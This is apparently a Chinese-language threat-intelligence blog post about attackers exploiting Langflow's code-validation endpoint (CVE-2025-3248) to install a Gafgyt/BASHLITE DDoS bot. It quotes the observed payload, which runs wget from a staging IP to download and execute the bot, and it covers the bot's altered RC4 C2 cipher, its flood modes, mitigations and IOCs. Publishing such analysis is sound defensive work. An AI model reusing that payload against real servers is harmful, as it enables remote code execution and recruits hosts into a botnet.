要点汇总
攻击者正积极利用 Langflow 代码验证 API 端点中的一个远程代码执行 (RCE) 漏洞。Langflow 是一款用于构建 AI 和大语言模型 (LLM) 应用原型的热门可视化框架。
一旦该框架失守,漏洞利用程序便会植入一个高度定制化的 Gafgyt 分布式拒绝服务 (DDoS) 爬虫程序变体。该特定载荷剥离了加密货币挖矿等次要功能,从而完全专注于网络流量横扫,并使用了一种复杂的改良版 RC4 流密码来隐藏其命令与控制 (C2) 通信,旨在绕过标准的自动化解码工具。
由于企业 AI 研发迭代极快,团队往往频繁将 Langflow 等实验性工具部署在生产或测试网络中,却未能实施妥善的网络分段、防火墙防护或严格的出站流量过滤。这催生出了一个高度受信任的环境,导致恶意的出站 C2 流量能够轻易绕过企业级的过滤机制。
筑牢 AI 基础架构的安全防线,必须回归基础的安全规范:修复 AI 编排平台中的任意代码执行缺陷、实施严格的出站流量过滤(例如阻断 1337 端口的越权流量)、通过 Web 应用程序防火墙 (WAF) 隔离开发环境,以及部署针对性的 YARA 签名。
过去几年,网络安全界始终在担忧高级 AI 威胁,例如自动化网络钓鱼、深度伪造以及自主恶意软件。然而,攻击者正用实际行动证明,他们的眼前目标要务实得多。他们不仅企图操纵 AI,更渴望劫持其底层基础架构,以此为传统的、海量化网络犯罪提供支持。
最新的威胁情报揭示了现代 AI 部署与经典僵尸网络架构之间一个极其罕见的交集:攻击者正积极利用 Langflow 中的 RCE 漏洞 CVE-2025-3248,以此来来植入老牌 Gafgyt/BASHLITE DDoS 爬虫程序的高度定制化变体。
在本博文中,我将详细介绍攻击者如何利用 CVE-2025-3248 漏洞,将前沿的 AI 框架转化为实施暴力攻击的网络武器。
初始突破口:CVE-2025-3248
Langflow Langflow 是一款备受开发者青睐的可视化框架,用于构建 AI 和 LLM 应用的原型并进行开发。由于此类应用天生需要具备测试和运行自定义逻辑的能力,因此其特定的端点本身就具备代码执行功能。
攻击者已利用这种能力反过来攻击该平台。在现网环境中,我们观察到以下针对其代码验证 API 的恶意载荷:
{
"code": "import os; os.system(\"wget -q -O /tmp/bot_x86_64 http://184.174.96.191:8088/bot.x86_64 && chmod +x /tmp/bot_x86_64 && /tmp/bot_x86_64\")"
}
漏洞剖析
漏洞根源:/api/v1/validate/code 端点接收不可信的 Python 脚本,并在未实施妥善沙盒隔离的情况下直接在主机系统上执行。
投递机制:被注入的代码利用标准 Python 库函数 (os.system) 来调用 wget。
凭据检索:程序从远程暂存服务器 (184.174.96.191:8088) 静默下载一个 x86_64 架构的 Linux 可执行文件,将其标记为可执行文件 (chmod +x),并直接从临时 /tmp 目录下启动该文件。
分析:Gafgyt/BASHLITE 变体
执行与规避行为
启动后,该二进制文件会执行一系列操作,以隐藏自身存在并准备其内部引擎:
自定义密码与 C2 协议
该变体实现了一种高级、多阶段的改良版 RC4 流密码,用以保护其 C2 通信。其加密方案在以下三个关键维度上偏离了标准 RC4 规范,旨在破坏标准的自动化解码工具:
非标准 S 盒种子:该加密方案并未对 S 盒进行线性初始化,而是利用自定义的等差数列对其进行填充:$S[i] = (0x0D + i \times 0xA7) \pmod{256}$。
双阶段密钥调度算法 (KSA):它使用硬编码的 32 位密钥(如 0xDEADBEEF、0xCAFEBABE 等)来改变 S 盒,然后通过经典的 Borland 线性同余生成器 (LCG) 进行五次高强度重排。
改进版伪随机生成算法 (PRGA):通过引入移位循环计数器和位运算(ROL 与 SHR),对生成的密钥流字节实施进一步的混淆。
攻击能力
该爬虫程序具有四条截然不同的执行路径,直接映射到 sendto 系统调用,分别对应四种经典的拒绝服务攻击媒介:
状态 | 攻击媒介 | 技术机制 |
|---|---|---|
0x01 | UDP 泛洪攻击 | 触发原始 sendto 循环,发送海量 UDP 数据报 |
0x02 | TCP 泛洪攻击 | 发起高频连接并进行大规模 SYN/ACK 报文轰炸 |
0x03 | HOLD 泛洪攻击 | 针对 Web 服务器实施长连接资源耗尽攻击 |
0x04 | Junk/STD 泛洪攻击 | 投递随机载荷的 UDP 泛洪,旨在耗尽目标系统的状态表 |
AI 基础架构面临的战略风险
我们很容易将 AI 应用视为与企业其他 IT 技术栈相隔离的独立环境,但在攻击者眼中,它们却是极其诱人的黄金资产。劫持 AI 服务器并将其强行并入僵尸网络,能为黑客带来诸多独特的资源优势:
海量算力与高带宽:AI 工作负载几乎总是托管在高性能云实例或稳健的企业级服务器上。这些机器天生拥有庞大的网络带宽,这正是发起毁灭性 DDoS 攻击必不可少的条件。
“影子 IT”漏洞隐患:由于 AI 研发正以惊人的速度迭代,研发团队往往频繁在生产或测试环境中直接搭建 Langflow 等实验性平台,却未能实施妥善的网络分段、漏洞管理或防火墙防护。
可信的网络环境:企业云基础架构通常享有更广泛的出站网络权限,这导致恶意的出站 C2 流量能够轻易绕过企业常规的出站过滤机制。
防御与缓解
如果您的团队正在使用 Langflow 或类似的业务可视化 AI 编排平台,强烈建议立即针对当前的安全态势调整防御策略。
修补与升级:确保您的 Langflow 部署已更新至最新安全版本,以彻底根除代码验证 API 中存在的任意代码执行缺陷。
实施严格的出站流量过滤:AI 模型训练和原型开发环境极少需要向任意公网 IP 地址发起毫无约束的出站 TCP 访问。请果断阻止通过 1337 等异常端口发起的出站连接。
网络隔离:将 AI 开发环境视为不可信的网络。利用 WAF(Web 应用程序防火墙)将其与企业核心主环境实施严格的微隔离,并限制其对公共互联网的访问。
部署 YARA 签名:针对系统二进制文件以及临时目录实施持续监控,全力捕捉该攻击者特有的加密 S 盒种子特征字节码:0d b4 5b 02 a9 50 f7 9e。
结语
对 CVE-2025-3248 漏洞的恶意利用给我们敲响了警钟:安全态势并非只是渐进式演进,而是正在发生颠覆性的结构质变。当我们将 Langflow 等强大的 AI 框架快速集成到企业系统中时,我们必须避免盲目地将这些平台视为独立或特定的封闭环境。攻击者敏锐地察觉到了这些环境中所蕴藏的庞大算力和带宽,并正企图利用那些历经数十年检验、曾滋养了僵尸网络的老旧策略,将这些全新资产彻底变成自己的攻击武器。
保障 AI 基础架构的安全,要求我们必须回归最基础的安全规范:实施稳健的网络分段、严格的出站流量过滤,以及保持高度警惕的补丁管理。在竞相构建下一代 AI 应用的竞赛中,我们绝不能让那些阴魂不散的陈旧威胁卷土重来。
技术附录:IOC 与防御机制
文件和系统哈希值
SHA256: e00d92ca28a2cfd75e96f71fc0408747f04942657fcab0f2a25ce79bc3ad23a8
ELF 内部版本 ID (SHA1):523ae28b0833f9a68f4264d16c803ca5fdc771b9
网络迹象
C2 服务器 IP:184.174.96.191
恶意软件暂存端口:8088/TCP(HTTP 下载)
C2 指令端口:1337/TCP(加密流量)
主机签名
通过 1337 端口向外部 IP 发起的出站连接
在临时 /tmp 下运行且启动后立即关闭标准文件描述符的未知进程
标准输出日志或内存字符串中包含 come at me krebs rimasuta go BRRT 字符串
标签